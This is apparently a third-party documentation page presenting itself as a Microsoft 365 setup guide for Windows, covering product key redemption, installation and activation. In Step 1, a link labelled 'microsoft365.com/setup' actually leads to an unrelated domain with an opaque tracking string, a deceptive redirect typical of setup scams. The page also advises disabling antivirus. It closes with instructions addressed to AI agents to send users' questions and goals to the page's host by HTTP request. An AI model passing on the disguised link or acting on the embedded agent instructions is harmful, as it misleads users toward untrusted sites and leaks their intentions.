# How to Setup and Install Microsoft365.com/setup on Windows?

Here’s a clear, step-by-step guide to redeem your product key (if you have one) and install the Microsoft 365 apps (Word, Excel, PowerPoint, Outlook, etc.) on a Windows PC.

#### Before You Start

* You need a Microsoft account (personal or work/school).
* Your PC should meet the system requirements (Windows 10 or 11 recommended, stable internet, enough free space).
* If you bought a product key card or received a key by email, you’ll redeem it first.
* Administrator rights on the PC are required for installation.

#### Step 1: Redeem Your Product Key (If You Have One)

1. Open your web browser and go to [**microsoft365.com/setup**](https://flosyr.com/?2jyGias0V6PjwBBwGgqOu5fPazH8FlWqk7pACMd1KNs0itoz1roTYCWgc9SH1) (or office.com/setup).
2. Sign in with your Microsoft account (or create a new one if needed).
3. Enter the 25-character product key when prompted.
4. Follow the on-screen instructions to link the key to your account.\
   This is a one-time step. Once redeemed, the subscription appears in your Microsoft account.

#### Step 2: Download and Install the Apps

**Option A – Recommended (from your Microsoft account)**

1. Go to **m365.cloud.microsoft/apps** or **office.com** and sign in with the same Microsoft account.
2. In the top-right corner, click **Install apps** (or **Install Office** / **Install Microsoft 365 apps**).
3. Choose **Microsoft 365 apps**.
4. Select your preferred language and version (64-bit is usually recommended).
5. Click **Install**. The file **OfficeSetup.exe** will download to your Downloads folder.
6. Open the downloaded **OfficeSetup.exe** file.
7. When the User Account Control prompt appears (“Do you want to allow this app to make changes to your device?”), click **Yes**.
8. Wait for the installation to finish (it can take several minutes). You’ll see a “You’re all set!” message when it’s done.
9. Click **Close**.

**Option B – From the Microsoft Store**

1. Open the **Microsoft Store** app on Windows.
2. Search for “Microsoft 365”.
3. Select the version that matches your subscription (Personal, Family, etc.).
4. Click **Install** (you must be signed in with the correct Microsoft account).

#### Step 3: Activate the Apps

1. Open any Microsoft 365 app (for example, Word or Excel) from the Start menu.
2. Sign in with the same Microsoft account you used earlier when prompted.
3. Accept the license agreement if asked.
4. The apps should now be activated and ready to use.

#### Extra Tips

* Installation requires an internet connection the first time so the apps can download and activate.
* You can install Microsoft 365 on multiple devices (limits depend on your subscription type — Personal vs Family vs Business).
* To reinstall later, just go back to m365.cloud.microsoft/apps and click Install again.
* If you have a work or school account, the steps are almost identical, but you’ll sign in with that account instead of a personal one.

#### Common Issues & Quick Fixes

* **Installation stuck or slow** → Check your internet connection and free disk space. Temporarily disable antivirus if needed.
* **Activation fails** → Make sure you’re signed in with the exact account that owns the subscription.
* **Already have an older Office version** → Uninstall the old version first (Settings → Apps → search for Microsoft Office or Office), then install the new one.
* **Error messages** → Use the built-in Microsoft 365 setup troubleshooter from the Microsoft Support site.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://helpivo-hub.gitbook.io/helpivo-hub-docs/how-to-setup-and-install-microsoft365.com-setup-on/how-to-setup-and-install-microsoft365.com-setup-on-windows.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `automate deployments from our CI pipeline` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
